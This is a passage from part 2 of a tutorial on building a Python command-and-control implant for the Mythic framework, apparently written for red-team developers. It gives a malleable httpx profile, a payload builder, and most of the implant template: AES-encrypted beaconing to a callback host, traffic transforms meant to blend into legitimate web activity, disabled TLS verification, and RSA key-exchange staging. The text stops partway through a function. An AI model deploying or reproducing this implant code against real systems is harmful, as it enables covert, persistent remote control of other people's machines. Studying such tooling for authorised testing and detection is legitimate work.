Building a Mythic C2 Agent in Python — Part 2: Batched Tasking, HTTPS, and the httpx Profile
Overview
Part 1 left us with a working but operationally naive agent. Three things need fixing before we can consider it even minimally production-ready:
- One task per beacon. The agent sends
tasking_size: 1and sleeps between every single task, even if Mythic has ten tasks queued. The Mythic docs explicitly describe a way to request all pending tasks and fold responses into the next tasking request to halve round trips. - Plaintext traffic. HTTP with no encryption is only acceptable for debugging. We need TLS and Mythic-managed AES-256 PSK encryption.
- No request shaping. The
httpprofile is fixed — the message always goes in the body of a POST. Thehttpxprofile lets you put the agent message anywhere in the request and customise every header, making the traffic blend into legitimate-looking web activity.
This part addresses all three. We'll also properly explain what a C2 profile actually is before introducing the new one.
1. What is a C2 Profile?
Before switching profiles it is worth understanding what they actually are. Per the Mythic C2 development docs:
C2 profiles live in their own docker containers and act as a translation mechanism between whatever your special sauce C2 protocol is and what the back-end Mythic server understands (HTTP + JSON). Their entire role in life is to get data off the wire from whatever special communications format you're using and forward that to Mythic.
And from the C2 profiles operational docs:
There are two main pieces for every C2 profile: Server code — code that runs in a docker container to convert the C2 profile communication specification into the corresponding RESTful endpoints that Mythic uses. Agent code — the code that runs in a callback to implement the C2 profile on the target machine.
A C2 profile is a separate Docker container. Your agent talks to the C2 profile container; the profile container talks to Mythic. The agent never communicates with Mythic directly:
Agent ──HTTP/S──▶ C2 Profile Container ──RabbitMQ──▶ Mythic Backend
◀────────── ◀────────────
http vs httpx
http is "simple HTTP async comms using standard GET/POST requests." The message is always in the POST body. There is no configuration of where the message lives or how it is transformed.
httpx is "a more dynamic and configurable HTTP profile." Per the README it supports:
- Message location in cookies, headers, query parameters, or body
- Message transforms: base64, base64url, XOR, NetBIOS, prepend, append
- Custom client/server headers
- Multiple callback domains with rotation
The configuration is provided via a JSON file uploaded at build time. This file is a contract between two parties:
- The httpx server container reads it to know how to parse incoming requests and format outgoing responses
- The agent must independently implement the same contract — applying the same transforms, using the same URI, placing the message in the specified location
The agent does not read the file at runtime. The relevant values (URI, message location, transforms) are extracted from the file by builder.py at build time and stamped into the agent as constants.
2. The Malleable Profile Config File
The profile config schema is shown in Xenon's example profiles. The top-level structure is:
{
"name": "Profile Name",
"get": {
"verb": "GET",
"uris": ["/uri1", "/uri2"],
"client": {
"headers": { "User-Agent": "..." },
"parameters": null,
"message": {
"location": "query",
"name": "filter"
},
"transforms": [
{ "action": "base64url", "value": "" }
]
},
"server": {
"headers": { "Content-Type": "application/json" },
"transforms": [
{ "action": "base64", "value": "" }
]
}
},
"post": {
"verb": "POST",
"uris": ["/upload"],
"client": {
"headers": { "Content-Type": "application/json" },
"parameters": null,
"message": {
"location": "body",
"name": ""
},
"transforms": [
{ "action": "base64", "value": "" }
]
},
"server": {
"headers": {},
"transforms": [
{ "action": "base64", "value": "" }
]
}
}
}
Key fields:
name— required. The httpx container uses this to identify the profile variation. Omitting it producesMissing name for agent variation.message.location— where the agent places the message:"body","query","header", or"cookie".message.name— the query parameter, header, or cookie name when location is not"body".client.transforms— transforms applied to the message before sending, in order.server.transforms— transforms the agent applies in reverse to decode the server's response.uris— array of URI paths. The agent selects from these per request.
Available transform actions per the httpx README: base64, base64url, xor, prepend, append, netbios, netbiosu.
The Profile for Part 2
Save this as pyrite_httpx.json before generating a payload. This uses the simplest possible transform (body + base64) to keep the agent straightforward while still correctly implementing the full pipeline:
{
"name": "Pyrite",
"get": {
"verb": "GET",
"uris": ["/"],
"client": {
"headers": {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
},
"parameters": null,
"message": {
"location": "body",
"name": ""
},
"transforms": [
{ "action": "base64", "value": "" }
]
},
"server": {
"headers": {},
"transforms": [
{ "action": "base64", "value": "" }
]
}
},
"post": {
"verb": "POST",
"uris": ["/data"],
"client": {
"headers": {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
"Content-Type": "application/octet-stream"
},
"parameters": null,
"message": {
"location": "body",
"name": ""
},
"transforms": [
{ "action": "base64", "value": "" }
]
},
"server": {
"headers": {},
"transforms": [
{ "action": "base64", "value": "" }
]
}
}
}
3. Install httpx and pycryptodome
sudo ./mythic-cli install github https://github.com/MythicC2Profiles/httpx
Also update pyrite/Dockerfile to install pycryptodome — the agent uses it for AES-256-CBC encryption:
FROM itsafeaturemythic/mythic_python_base:latest
WORKDIR /Mythic/
RUN pip install requests pycryptodome
CMD ["python3", "main.py"]
pycryptodome must also be available on the target machine where the agent runs. If the target is a controlled lab host, install it with pip install pycryptodome. For targets where you cannot guarantee it is available, use AESPSK = none (plaintext mode). A production agent would bundle the AES implementation — Part 3 addresses this when we implement a custom protocol.
4. builder.py — Full Updated Version
File:pyrite/mythic/agent_functions/builder.pyThis file runs inside the Mythic container. It must contain only thePyrite(PayloadType)class. It must not contain anyREPLACE_*tokens — those belong exclusively inpyrite/agent_code/pyrite_agent.py. Ifbuilder.pycontainsREPLACE_*tokens, Python will throw aNameErrorwhen importing the container because those tokens are not valid Python identifiers.
Themythic/agent_functions/layout follows the Medusa convention established in Part 1. All server-side container code lives underpyrite/mythic/; implant code lives underpyrite/agent_code/.
# pyrite/mythic/agent_functions/builder.py
import logging
import pathlib
import json
from mythic_container.PayloadBuilder import *
from mythic_container.MythicCommandBase import *
from mythic_container.MythicRPC import *
class Pyrite(PayloadType):
name = "pyrite"
file_extension = "py"
author = "@yourhandle"
supported_os = [SupportedOS.Linux, SupportedOS.Windows, SupportedOS.MacOS]
wrapper = False
wrapped_payloads = []
note = "Simple Python3 agent for demonstrating Mythic agent development."
supports_dynamic_loading = True
mythic_encrypts = True
translation_container = None
c2_profiles = ["httpx"] # Part 2: httpx only
build_parameters = [
BuildParameter(
name="version",
parameter_type=BuildParameterType.String,
description="Agent version string",
default_value="0.1.0",
required=False,
),
]
agent_path = pathlib.Path(".") / "pyrite"
agent_icon_path = agent_path / "mythic" / "agent_functions" / "pyrite.svg"
agent_code_path = agent_path / "agent_code"
build_steps = [
BuildStep(
step_name="Gathering Files",
step_description="Reading agent template and command files from disk",
),
BuildStep(
step_name="Configuring",
step_description="Stamping C2 parameters into the agent source",
),
]
async def build(self) -> BuildResponse:
resp = BuildResponse(status=BuildStatus.Success)
# ── Step 1: Read template and command files ────────────────────────
try:
agent_source = open(self.agent_code_path / "pyrite_agent.py", "r").read()
command_code = ""
for cmd in self.commands.get_commands():
try:
command_code += open(self.agent_code_path / f"{cmd}.py", "r").read() + "\n"
except FileNotFoundError:
pass
agent_source = agent_source.replace(
"# ##COMMAND_CODE_INSERT##",
command_code
)
await SendMythicRPCPayloadUpdatebuildStep(
MythicRPCPayloadUpdateBuildStepMessage(
PayloadUUID=self.uuid,
StepName="Gathering Files",
StepStdout="Read agent template and command files successfully",
StepSuccess=True,
)
)
except Exception as e:
await SendMythicRPCPayloadUpdatebuildStep(
MythicRPCPayloadUpdateBuildStepMessage(
PayloadUUID=self.uuid,
StepName="Gathering Files",
StepStdout=str(e),
StepSuccess=False,
)
)
resp.set_status(BuildStatus.Error)
resp.build_stderr = f"Failed to read agent template: {e}"
return resp
# ── Step 2: Extract parameters and stamp into agent ────────────────
try:
if len(self.c2info) != 1:
raise ValueError(f"Expected 1 C2 profile, got {len(self.c2info)}")
params = self.c2info[0].get_parameters_dict()
# ── AESPSK ─────────────────────────────────────────────────────
# AESPSK is a C2 profile parameter with crypto_type=True.
# When operator selects "aes256_hmac", Mythic auto-generates a
# 32-byte per-payload AES key and returns it as a dict.
# When "none" is selected, no key is generated.
# Per the Mythic checkin docs, Mythic looks up this key by
# PayloadUUID to know how to decrypt incoming agent messages.
aespsk_raw = params.get("AESPSK")
if isinstance(aespsk_raw, dict):
aespsk = aespsk_raw.get("enc_key") or ""
elif aespsk_raw:
aespsk = str(aespsk_raw)
else:
aespsk = ""
# ── encrypted_exchange_check ────────────────────────────────────
# Boolean C2 profile parameter defined by httpx. Controls whether
# the agent performs RSA EKE (staging_rsa exchange) before checkin.
# True + AESPSK set → EKE: use AESPSK only for staging exchange,
# then use negotiated session key for all traffic
# False + AESPSK set → Static PSK: use AESPSK for all traffic directly
# False + no AESPSK → Plaintext: no encryption
eke_raw = params.get("encrypted_exchange_check", False)
if isinstance(eke_raw, str):
eke_enabled = eke_raw.lower() in ("true", "t", "1", "yes")
else:
eke_enabled = bool(eke_raw)
use_eke = eke_enabled and bool(aespsk)
# ── Callback domains ───────────────────────────────────────────
# httpx uses callback_domains (array of full URLs).
# Mythic may return it as a Python list or as a JSON array string.
callback_domains = params.get("callback_domains", ["http://127.0.0.1:80"])
if isinstance(callback_domains, str):
# Try to parse as JSON array e.g. '["http://127.0.0.1:82"]'
try:
callback_domains = json.loads(callback_domains)
except Exception:
callback_domains = [callback_domains]
if isinstance(callback_domains, list) and callback_domains:
first_domain = str(callback_domains[0]).strip()
else:
first_domain = str(callback_domains).strip()
# Parse scheme://host:port
# e.g. "http://127.0.0.1:82" → host="http://127.0.0.1", port="82"
import re
domain_match = re.match(r'^(https?://[^:/]+):(\d+)/?$', first_domain)
if domain_match:
callback_host = domain_match.group(1)
callback_port = domain_match.group(2)
else:
# No explicit port — use scheme default
callback_host = first_domain.rstrip("/")
callback_port = "443" if first_domain.startswith("https") else "80"
# ── Parse the uploaded malleable profile config file ────────────
# The correct parameter key is "raw_c2_config".
# It contains the JSON/TOML profile config file contents as a string.
profile_config = {}
raw_config = params.get("raw_c2_config")
if raw_config:
if isinstance(raw_config, str) and len(raw_config) == 36:
# It's a file UUID — fetch contents via MythicRPC
file_resp = await SendMythicRPCFileGetContent(
MythicRPCFileGetContentMessage(AgentFileId=raw_config)
)
if file_resp.Success:
profile_config = json.loads(file_resp.Content)
elif isinstance(raw_config, str):
profile_config = json.loads(raw_config)
elif isinstance(raw_config, dict):
profile_config = raw_config
# ── Extract values from the profile config ──────────────────────
# POST block — used for checkin and post_response
post_block = profile_config.get("post", {})
post_client = post_block.get("client", {})
post_msg = post_client.get("message", {})
post_server = post_block.get("server", {})
post_uris = post_block.get("uris", ["/data"])
post_uris_json = json.dumps(post_uris)
post_uri = post_uris[0] if post_uris else "/data" # kept for fallback
post_msg_loc = post_msg.get("location", "body")
post_msg_name = post_msg.get("name", "")
post_transforms = json.dumps(post_client.get("transforms", []))
post_srv_xforms = json.dumps(post_server.get("transforms", []))
post_headers = json.dumps(post_client.get("headers", {}))
# GET block — used for get_tasking
get_block = profile_config.get("get", {})
get_client = get_block.get("client", {})
get_msg = get_client.get("message", {})
get_server = get_block.get("server", {})
get_uris = get_block.get("uris", ["/"])
get_uris_json = json.dumps(get_uris)
get_uri = get_uris[0] if get_uris else "/" # kept for fallback
get_msg_loc = get_msg.get("location", "body")
get_msg_name = get_msg.get("name", "")
get_transforms = json.dumps(get_client.get("transforms", []))
get_srv_xforms = json.dumps(get_server.get("transforms", []))
get_headers = json.dumps(get_client.get("headers", {}))
# ── Build replacements dict ─────────────────────────────────────
# Every value must be a str — params.get() can return None for
# optional fields and str.replace() will raise if given None.
def s(val, default=""):
return str(val) if val is not None else default
replacements = {
"REPLACE_CALLBACK_HOST": callback_host,
"REPLACE_CALLBACK_PORT": callback_port,
"REPLACE_CALLBACK_INTERVAL": s(params.get("callback_interval"), "10"),
"REPLACE_CALLBACK_JITTER": s(params.get("callback_jitter"), "23"),
"REPLACE_PAYLOAD_UUID": str(self.uuid),
"REPLACE_AESPSK": aespsk,
"REPLACE_KILL_DATE": s(params.get("killdate"), ""),
"REPLACE_USE_EKE": str(use_eke),
# POST profile values
"REPLACE_POST_URIS": post_uris_json, # list literal
"REPLACE_POST_URI": post_uri,
"REPLACE_POST_MSG_LOC": post_msg_loc,
"REPLACE_POST_MSG_NAME": post_msg_name,
"REPLACE_POST_TRANSFORMS": post_transforms,
"REPLACE_POST_SERVER_TRANSFORMS": post_srv_xforms,
"REPLACE_POST_HEADERS": post_headers,
# GET profile values
"REPLACE_GET_URIS": get_uris_json, # list literal
"REPLACE_GET_URI": get_uri,
"REPLACE_GET_MSG_LOC": get_msg_loc,
"REPLACE_GET_MSG_NAME": get_msg_name,
"REPLACE_GET_TRANSFORMS": get_transforms,
"REPLACE_GET_SERVER_TRANSFORMS": get_srv_xforms,
"REPLACE_GET_HEADERS": get_headers,
}
for token, value in replacements.items():
agent_source = agent_source.replace(token, value)
await SendMythicRPCPayloadUpdatebuildStep(
MythicRPCPayloadUpdateBuildStepMessage(
PayloadUUID=self.uuid,
StepName="Configuring",
StepStdout="Stamped all C2 parameters into agent source",
StepSuccess=True,
)
)
resp.payload = agent_source.encode()
resp.build_message = "Pyrite built successfully."
except Exception as e:
await SendMythicRPCPayloadUpdatebuildStep(
MythicRPCPayloadUpdateBuildStepMessage(
PayloadUUID=self.uuid,
StepName="Configuring",
StepStdout=str(e),
StepSuccess=False,
)
)
resp.set_status(BuildStatus.Error)
resp.build_stderr = f"Configuration failed: {e}"
return resp
5. Understanding mythic_encrypts, AESPSK, and encrypted_exchange_check
mythic_encrypts
mythic_encrypts = True in builder.py is a developer declaration — it tells Mythic that the agent implements the AES-256-CBC + HMAC-SHA256 encryption itself. The C2 profile container is a transparent forwarder. The agent encrypts, Mythic's backend decrypts.
AESPSK — the encryption key parameter
AESPSK is a C2 profile parameter with crypto_type=True. Per the Mythic checkin docs:
When creating payloads, you can generate encryption keys per C2 profile. To do so, the C2 Profile will have a parameter that has an attribute calledcrypto_type=True. This will then signal to Mythic to either generate a new per-payload AES256_HMAC key... In thehttpprofile for example, this is aChooseOneoption betweenaes256_hmacornone.
When aes256_hmac is selected, Mythic auto-generates a 32-byte per-payload AES key and returns it in params["AESPSK"] as {"enc_key":"...","dec_key":"...","value":"aes256_hmac"}. The builder stamps this key into the agent as AESPSK. Mythic also stores it server-side and uses the outer UUID to look it up when decrypting inbound messages.
When none is selected, no key is generated and AESPSK is empty.
encrypted_exchange_check — EKE toggle
encrypted_exchange_check is a boolean parameter defined by the C2 profile — both http and httpx include it. It is not a Mythic core concept (the Mythic docs do not mention it by name), but it is a de facto convention across multiple profiles. It controls whether the agent performs RSA EKE before the static-PSK checkin.
The combination matrix:
AESPSK | encrypted_exchange_check | What the agent does |
|---|---|---|
none | either | Plaintext checkin — no key exists, EKE is impossible regardless of this flag |
aes256_hmac | false | Static PSK — use the stamped-in AESPSK to encrypt all traffic directly, no EKE staging |
aes256_hmac | true | EKE — use AESPSK only for the staging_rsa exchange to negotiate a per-session key, then use that session key for all subsequent traffic |
The key difference between static PSK and EKE: with static PSK, the embedded key is used for every callback from that payload — anyone who extracts the binary can decrypt all traffic. With EKE, the embedded key only protects the staging exchange; session traffic uses a unique key negotiated at runtime that never touches disk.
The builder computes USE_EKE = encrypted_exchange_check AND AESPSK_is_set and stamps it into the agent as REPLACE_USE_EKE. do_checkin branches on USE_EKE.
Wire format
Regardless of which path is taken, the message format follows the Mythic spec. With encryption active:
Base64( UUID(36) + IV(16) + AES-CBC(JSON body) + HMAC-SHA256(IV + ciphertext) )
Without encryption:
Base64( UUID(36) + JSON body )
6. The Full Agent Template — pyrite_agent.py
File:pyrite/agent_code/pyrite_agent.pyThis file is the implant template. It is read as a text file bybuilder.pyat build time — it is never imported by Python directly. TheREPLACE_*tokens are plain text substitution markers, not Python variables. Do not put this code inmythic/agent_functions/builder.py.
Replace the file entirely. The agent from Part 1 has no AES implementation — it will stamp in the AESPSK key but never use it, sending plaintext regardless of what the operator selects. Delete the old file and replace it with the version below.
Also update the stale comment in builder.py Step 2 — replace the old comment block for AESPSK with:
# ── AESPSK ─────────────────────────────────────────────────────
# The agent uses this key to encrypt every message body.
# "aes256_hmac" → Mythic returns {"enc_key": "...", "dec_key": "...", "value": "aes256_hmac"}
# "none" → stamp empty string, agent sends plaintext
This is the complete rewrite of the agent for httpx. All profile values are stamped in as constants at build time. The agent implements the full transform pipeline and AES-256-CBC + HMAC-SHA256 encryption.
Note the token format for list and dict values: they are written without quotes in the template because the builder substitutes them with Python literal values via json.dumps():
# In template — no quotes:
GET_TRANSFORMS = REPLACE_GET_TRANSFORMS
# After builder substitution — valid Python literal:
GET_TRANSFORMS = [{"action": "base64", "value": ""}]
#!/usr/bin/env python3
"""
pyrite_agent.py — Pyrite implant for Mythic C2 (Part 2: httpx)
THIS IS A TEMPLATE. All REPLACE_* tokens are substituted at build time
by builder.py. Do not replace them with real values here.
"""
import base64
import datetime
import json
import os
import platform
import random
import socket
import subprocess
import sys
import time
import traceback
try:
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
except ImportError:
import urllib.request
import urllib.error
requests = None
# ── Configuration stamped in by builder.py ────────────────────────────────────
CALLBACK_HOST = "REPLACE_CALLBACK_HOST"
CALLBACK_PORT = REPLACE_CALLBACK_PORT
CALLBACK_INTERVAL = REPLACE_CALLBACK_INTERVAL
CALLBACK_JITTER = REPLACE_CALLBACK_JITTER
PAYLOAD_UUID = "REPLACE_PAYLOAD_UUID"
AESPSK = "REPLACE_AESPSK"
KILL_DATE_STR = "REPLACE_KILL_DATE"
USE_EKE = REPLACE_USE_EKE # True if encrypted_exchange_check=true AND AESPSK set
# ── Profile-derived values stamped in by builder.py ───────────────────────────
# These come from the uploaded malleable profile config file.
# List and dict tokens are substituted WITHOUT quotes — they become
# Python literal values directly (e.g. [{"action": "base64", "value": ""}]).
POST_URIS = REPLACE_POST_URIS
POST_URI = "REPLACE_POST_URI"
POST_MSG_LOC = "REPLACE_POST_MSG_LOC"
POST_MSG_NAME = "REPLACE_POST_MSG_NAME"
POST_TRANSFORMS = REPLACE_POST_TRANSFORMS
POST_SERVER_TRANSFORMS = REPLACE_POST_SERVER_TRANSFORMS
POST_HDRS = REPLACE_POST_HEADERS
GET_URIS = REPLACE_GET_URIS
GET_URI = "REPLACE_GET_URI"
GET_MSG_LOC = "REPLACE_GET_MSG_LOC"
GET_MSG_NAME = "REPLACE_GET_MSG_NAME"
GET_TRANSFORMS = REPLACE_GET_TRANSFORMS
GET_SERVER_TRANSFORMS = REPLACE_GET_SERVER_TRANSFORMS
GET_HDRS = REPLACE_GET_HEADERS
# ── Globals ────────────────────────────────────────────────────────────────────
CALLBACK_UUID = None
SESSION_KEY = None # negotiated AES key after EKE staging — replaces AESPSK
BASE_URL = f"{CALLBACK_HOST}:{CALLBACK_PORT}"
_pending_responses = []
# ─────────────────────────────────────────────────────────────────────────────
# AES-256-CBC + HMAC-SHA256 Encryption
# ─────────────────────────────────────────────────────────────────────────────
# Per the Mythic agent message format docs:
# https://docs.mythic-c2.net/customizing/payload-type-development/
# create_tasking/agent-side-coding/initial-checkin
#
# Wire format when AESPSK is set:
# Base64( UUID(36) + IV(16) + AES-CBC(JSON) + HMAC-SHA256(IV + ciphertext) )
#
# AES details (from docs):
# Mode: CBC
# Padding: PKCS7, block size 16
# IV: 16 random bytes, fresh per message
# HMAC: SHA256 over (IV + ciphertext) using the same AES key, appended after ciphertext
#
# Uses pycryptodome if available, falls back to pyca/cryptography.
# Add to Dockerfile: RUN pip install pycryptodome
import hashlib
import hmac as _hmac_mod
try:
from Crypto.Cipher import AES as _AES
from Crypto.Util.Padding import pad as _pad, unpad as _unpad
_CRYPTO_LIB = "pycryptodome"
except ImportError:
try:
from cryptography.hazmat.primitives.ciphers import Cipher as _Cipher
from cryptography.hazmat.primitives.ciphers.algorithms import AES as _AESAlgo
from cryptography.hazmat.primitives.ciphers.modes import CBC as _CBC
from cryptography.hazmat.primitives import padding as _padding
_CRYPTO_LIB = "cryptography"
except ImportError:
_CRYPTO_LIB = None
def mythic_encrypt(plaintext_json: bytes, aes_key_b64: str) -> bytes:
"""
Encrypt a JSON body per the Mythic static-encryption spec.
Returns: IV(16) + AES-CBC(padded plaintext) + HMAC-SHA256(IV + ciphertext)
The UUID prefix is NOT included here — it is prepended in send_message.
"""
key = base64.b64decode(aes_key_b64)
iv = os.urandom(16)
if _CRYPTO_LIB == "pycryptodome":
cipher = _AES.new(key, _AES.MODE_CBC, iv)
padded = _pad(plaintext_json, 16)
ciphertext = cipher.encrypt(padded)
elif _CRYPTO_LIB == "cryptography":
padder = _padding.PKCS7(128).padder()
padded = padder.update(plaintext_json) + padder.finalize()
cipher = _Cipher(_AESAlgo(key), _CBC(iv))
encryptor = cipher.encryptor()
ciphertext = encryptor.update(padded) + encryptor.finalize()
else:
raise RuntimeError("No AES library available. Install pycryptodome.")
mac = _hmac_mod.new(key, iv + ciphertext, hashlib.sha256).digest()
return iv + ciphertext + mac
def mythic_decrypt(data: bytes, aes_key_b64: str) -> bytes:
"""
Decrypt a Mythic-format encrypted blob.
data = IV(16) + ciphertext + HMAC-SHA256(32)
Verifies HMAC before decrypting. Returns plaintext JSON bytes.
"""
key = base64.b64decode(aes_key_b64)
iv = data[:16]
mac = data[-32:]
ciphertext = data[16:-32]
expected = _hmac_mod.new(key, iv + ciphertext, hashlib.sha256).digest()
if not _hmac_mod.compare_digest(mac, expected):
raise ValueError("HMAC verification failed — message may be tampered or key is wrong")
if _CRYPTO_LIB == "pycryptodome":
cipher = _AES.new(key, _AES.MODE_CBC, iv)
padded = cipher.decrypt(ciphertext)
return _unpad(padded, 16)
elif _CRYPTO_LIB == "cryptography":
cipher = _Cipher(_AESAlgo(key), _CBC(iv))
decryptor = cipher.decryptor()
padded = decryptor.update(ciphertext) + decryptor.finalize()
unpadder = _padding.PKCS7(128).unpadder()
return unpadder.update(padded) + unpadder.finalize()
else:
raise RuntimeError("No AES library available. Install pycryptodome.")
# ─────────────────────────────────────────────────────────────────────────────
# Transform Pipeline
# ─────────────────────────────────────────────────────────────────────────────
def apply_transforms(data: bytes, transforms: list) -> bytes:
"""
Apply a list of transforms in order to data before sending.
Each transform is {"action": "...", "value": "..."}.
Available actions per the httpx README:
base64, base64url, xor, prepend, append, netbios, netbiosu
"""
for t in transforms:
action = t.get("action", "")
value = t.get("value", "")
if action == "base64":
data = base64.b64encode(data)
elif action == "base64url":
# Keep '=' padding — the httpx Go container uses base64.URLEncoding
# which requires padding. Stripping '=' causes "illegal base64 data"
# errors when the encoded length is not a multiple of 4.
data = base64.urlsafe_b64encode(data)
elif action == "prepend":
data = value.encode("utf-8") + data
elif action == "append":
data = data + value.encode("utf-8")
elif action == "xor":
key = value.encode("utf-8")
data = bytes(b ^ key[i % len(key)] for i, b in enumerate(data))
elif action == "netbios":
result = b""
for byte in data:
result += bytes([ord('a') + (byte >> 4), ord('a') + (byte & 0xf)])
data = result
elif action == "netbiosu":
result = b""
for byte in data:
result += bytes([ord('A') + (byte >> 4), ord('A') + (byte & 0xf)])
data = result
return data
def reverse_transforms(data: bytes, transforms: list) -> bytes:
"""
Reverse a list of transforms in reverse order to decode a server response.
"""
for t in reversed(transforms):
action = t.get("action", "")
value = t.get("value", "")
if action == "base64":
data = base64.b64decode(data)
elif action == "base64url":
pad = (4 - len(data) % 4) % 4
data = base64.urlsafe_b64decode(data + b"=" * pad)
elif action == "prepend":
data = data[len(value.encode("utf-8")):]
elif action == "append":
data = data[:-len(value.encode("utf-8"))]
elif action == "xor":
key = value.encode("utf-8")
data = bytes(b ^ key[i % len(key)] for i, b in enumerate(data))
elif action in ("netbios", "netbiosu"):
result = b""
base = ord('a') if action == "netbios" else ord('A')
for i in range(0, len(data), 2):
high = data[i] - base
low = data[i + 1] - base
result += bytes([(high << 4) | low])
data = result
return data
# ─────────────────────────────────────────────────────────────────────────────
# HTTP Transport
# ─────────────────────────────────────────────────────────────────────────────
def _place_message(method: str, url: str, encoded: bytes,
msg_loc: str, msg_name: str, extra_headers: dict) -> bytes:
"""
Send the encoded message using the HTTP method, URL, and placement
location specified in the profile config.
Returns the raw response bytes.
"""
headers = dict(extra_headers)
if requests:
if msg_loc == "body":
if method == "GET":
r = requests.get(url, data=encoded, headers=headers,
verify=False, timeout=30)
else:
r = requests.post(url, data=encoded, headers=headers,
verify=False, timeout=30)
elif msg_loc == "query":
# Build the URL manually to avoid requests URL-encoding the value.
# requests' params= dict would encode '+' as '%2B', breaking base64
# in the query string. Our encoded value is already URL-safe (the
# profile should use base64url for query placement, not base64).
sep = "&" if "?" in url else "?"
full_url = f"{url}{sep}{msg_name}={encoded.decode('utf-8')}"
if method == "GET":
r = requests.get(full_url, headers=headers,
verify=False, timeout=30)
else:
r = requests.post(full_url, headers=headers,
verify=False, timeout=30)
elif msg_loc == "header":
headers[msg_name] = encoded.decode("utf-8")
if method == "GET":
r = requests.get(url, headers=headers,
verify=False, timeout=30)
else:
r = requests.post(url, headers=headers,
verify=False, timeout=30)
elif msg_loc == "cookie":
cookies = {msg_name: encoded.decode("utf-8")}
if method == "GET":
r = requests.get(url, cookies=cookies, headers=headers,
verify=False, timeout=30)
else:
r = requests.post(url, cookies=cookies, headers=headers,
verify=False, timeout=30)
else:
raise ValueError(f"Unknown message location: {msg_loc}")
return r.content
else:
# urllib fallback — body placement only
req = urllib.request.Request(
url, data=encoded, headers=headers, method=method
)
with urllib.request.urlopen(req, timeout=30) as r:
return r.read()
def send_message(uuid_str: str, payload: dict, use_get: bool = False,
override_key: str = None) -> dict:
"""
Full send/receive cycle. Encrypts with SESSION_KEY if established (post-EKE),
falls back to AESPSK (staging phase), then plaintext.
override_key allows staging to specify which key to use explicitly.
"""
active_key = override_key or SESSION_KEY or AESPSK
json_body = json.dumps(payload).encode("utf-8")
if active_key:
body = mythic_encrypt(json_body, active_key)
else:
body = json_body
raw = uuid_str.encode("utf-8") + body
wire = base64.b64encode(raw)
if use_get:
encoded = apply_transforms(wire, GET_TRANSFORMS)
url = f"{BASE_URL}{random.choice(GET_URIS)}"
method = "GET"
msg_loc, msg_name, hdrs = GET_MSG_LOC, GET_MSG_NAME, GET_HDRS
s_xforms = GET_SERVER_TRANSFORMS
else:
encoded = apply_transforms(wire, POST_TRANSFORMS)
url = f"{BASE_URL}{random.choice(POST_URIS)}"
method = "POST"
msg_loc, msg_name, hdrs = POST_MSG_LOC, POST_MSG_NAME, POST_HDRS
s_xforms = POST_SERVER_TRANSFORMS
# ── DEBUG ─────────────────────────────────────────────────────────────────
key_label = (
f"EKE session ({SESSION_KEY[:16]}...)" if SESSION_KEY and not override_key else
f"override key ({override_key[:16]}...)" if override_key else
f"static PSK ({AESPSK[:16]}...)" if AESPSK else
"plaintext"
)
print(f"\n[DEBUG] OUTGOING ({method} {url})")
print(f" action : {payload.get('action', '?')}")
print(f" outer UUID: {uuid_str}")
print(f" key used : {key_label}")
print(f" raw[:60] : {raw[:60]}...")
print(f" wire[:60] : {wire[:60]}...")
print(f" encoded head (20): {encoded[:20]}")
print(f" encoded tail (20): {encoded[-20:]}", flush=True)
# ── END DEBUG ─────────────────────────────────────────────────────────────
raw_resp = _place_message(method, url, encoded, msg_loc, msg_name, hdrs)
decoded = reverse_transforms(raw_resp, s_xforms)
print(f"[DEBUG] INCOMING: {raw_resp[:60]}...", flush=True)
unwrapped = base64.b64decode(decoded + b'====')
resp_body = unwrapped[36:]
if not resp_body:
raise RuntimeError(
f"Empty response body from {url} — check C2 container logs: "
"sudo ./mythic-cli logs httpx"
)
if active_key:
resp_body = mythic_decrypt(resp_body, active_key)
return json.loads(resp_body)
# ─────────────────────────────────────────────────────────────────────────────
# Kill Date
# ─────────────────────────────────────────────────────────────────────────────
def check_kill_date() -> None:
if not KILL_DATE_STR:
return
try:
if datetime.date.today() >= datetime.date.fromisoformat(KILL_DATE_STR):
os._exit(0)
except ValueError:
pass
# ─────────────────────────────────────────────────────────────────────────────
# EKE Staging + Checkin
# ─────────────────────────────────────────────────────────────────────────────
def get_ip() -> str:
try:
return socket.gethostbyname(socket.gethostname())
except Exception:
return "127.0.0.1"
def _gen_session_id(length: int = 20) -> str:
import string
chars = string.ascii_letters + string.digits
return "".join(random.choice(chars) for _ in range(length))
def do_staging_rsa() -> tuple:
"""
Perform RSA-based Encrypted Key Exchange with Mythic.
Per the Mythic checkin docs:
https://docs.mythic-c2.net/customizing/payload-type-development/
create_tasking/agent-side-coding/initial-checkin
#eke-by-generating-client-side-rsa-keys
Phase 1 — Agent sends to Mythic (encrypted with static AESPSK):
Base64( PayloadUUID + AES256(AESPSK, {"action":"staging_rsa",
"pub_key":"<b64 RSA PEM>", "session_id":"<20char>"}) )
Phase 1 — Mythic responds (encrypted with static AESPSK):
Base64( PayloadUUID + AES256(AESPSK, {"action":"staging_rsa",
"uuid":"<tempUUID>",
"session_key":"<RSAPub(new_aes_key)>",
"session_id":"<same 20char>"}) )
RSA details from docs: 4096-bit, PKCS1_OAEP with SHA1.
Returns (tempUUID, session_key_b64) for use in the subsequent checkin.
Sets SESSION_KEY global.
"""
global SESSION_KEY
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
from Crypto.Hash import SHA1
rsa_key = RSA.generate(4096)
pub_pem_b64 = base64.b64encode(
rsa_key.publickey().export_key("PEM")
).decode("utf-8")
session_id = _gen_session_id(20)
staging_msg = {
"action": "staging_rsa",
"pub_key": pub_pem_b64,
"session_id": session_id,
}
# Send staging_rsa encrypted with static AESPSK using PAYLOAD_UUID
response = send_message(PAYLOAD_UUID, staging_msg, use_get=False,
override_key=AESPSK)
if response.get("action") != "staging_rsa":
raise RuntimeError(f"Unexpected staging response: {response.get('action')}")
if response.get("session_id") != session_id:
raise RuntimeError("Session ID mismatch in staging response")
temp_uuid = response["uuid"]
session_key_enc = base64.b64decode(response["session_key"])
# Decrypt session key with our RSA private key
# Per Mythic docs: PKCS1_OAEP with SHA1, 4096-bit
cipher_rsa = PKCS1_OAEP.new(rsa_key, hashAlgo=SHA1)
session_key = cipher_rsa.decrypt(session_key_enc)
SESSION_KEY = base64.b64encode(session_key).decode("utf-8")
return temp_uuid, SESSION_KEY
def debug_startup() -> None:
"""
